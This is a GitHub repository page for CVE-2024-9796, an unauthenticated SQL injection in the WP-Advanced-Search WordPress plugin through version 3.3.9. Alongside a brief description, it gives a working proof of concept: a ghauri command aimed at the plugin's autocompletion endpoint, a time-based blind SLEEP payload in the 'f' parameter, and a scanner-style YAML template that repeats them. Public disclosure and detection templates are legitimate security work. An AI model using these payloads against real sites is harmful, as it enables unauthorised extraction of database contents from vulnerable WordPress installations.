Skip to content
/ CVE-2024-9796 Public

WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection

3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

issamjr/CVE-2024-9796

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
CVE-2024-9796.yaml
CVE-2024-9796.yaml
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-9796

WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection Vulnerability

Description

The WP-Advanced-Search plugin for WordPress (versions up to and including 3.3.9) is vulnerable to SQL injection. This vulnerability exists due to insufficient escaping of user-supplied parameters and lack of SQL query preparation. As a result, unauthenticated attackers can inject additional SQL queries into existing ones, potentially extracting sensitive information from the database.

Vulnerability Details

  • Type: Plugin
  • CVSS Score: 7.5 (High)
  • CVE: CVE-2024-9796
  • Plugin Slug: wp-advanced-search

Download Link

Download WP-Advanced-Search Version 3.3.9

Proof of Concept (PoC)

An example of exploiting the SQL injection vulnerability using the autocompletion-PHP5.5.php endpoint:

ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"

Payload Example

The following payload demonstrates a time-based blind SQL injection using the vulnerable f parameter:

Parameter: f (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853
id: CVE-2024-9796 

info:
  name: "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection"
  author: "Issam Junior"
  severity: "critical"
  metadata:
    verified: true
    max-request: 2
  tags: "github.com/fa-rrel ==> WHAT DO YOU THINK ABOUT ME ?"

variables:
  cve: "CVE-2024-9796"
  plugin_name: "wp-advanced-search"
  plugin_version: "3.3.9"
  type: "plugin"
  description: |
    The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9. 
    This vulnerability is caused by insufficient escaping on user-supplied parameters and a lack of proper preparation of the existing SQL query.
    This makes it possible for unauthenticated attackers to append arbitrary SQL queries to existing queries, potentially leading to the 
    extraction of sensitive information from the database.
  download_link: "https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip"
  cvss_score: 7.5

poc:
  - "ghauri -u \"https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899\""
  - "Parameter: f (GET)"
  - "Type: time-based blind"
  - "Title: MySQL >= 5.0.12 time-based blind (IF - comment)"
  - "Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853'"

About

WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection

Resources

Readme
Activity

Stars

3 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published